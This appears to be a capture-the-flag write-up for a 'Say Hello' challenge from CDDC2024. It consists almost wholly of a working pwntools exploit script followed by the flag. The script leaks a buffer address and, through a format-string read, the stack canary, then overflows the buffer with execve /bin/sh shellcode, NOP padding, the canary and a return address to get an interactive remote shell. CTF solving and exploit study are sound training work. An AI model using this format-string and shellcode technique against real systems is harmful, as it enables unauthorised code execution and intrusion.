Skip to main content

Say Hello

  • Technique: Shellcode

Script

from pwn import *

r = remote('3.1.147.170', 10010)

elf = context.binary = ELF('./say_hello')

# r = elf.process()
# r = gdb.debug("./say_hello", gdbscript='''b*main+280''')

r.recvuntil(b'buffer : ')
buffer = int(r.recvuntil(b'\n', drop=True),16)
log.info(f'leaked buf addr: {hex(buffer)}')

# leak canary offset
r.sendline(b'1')
r.sendline(f'%1$p'.encode())
r.sendline(b'2')
r.recvuntil(b'Hello ')

canary = int(r.recvuntil(b'\n', drop=True).decode(),16)
log.info(f'leaked canary: {hex(canary)}')
shellcode = asm(shellcraft.sh())
shellcode = b"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
padding = (32 - len(shellcode)) * b'\x90'

payload = shellcode + padding + p32(canary) + b'B'*8 + p32(buffer)

r.sendline(b'3')
r.sendline(payload)
r.interactive()

Flag

CDDC2024{TH1S_1S_MY_RE4L_N4ME}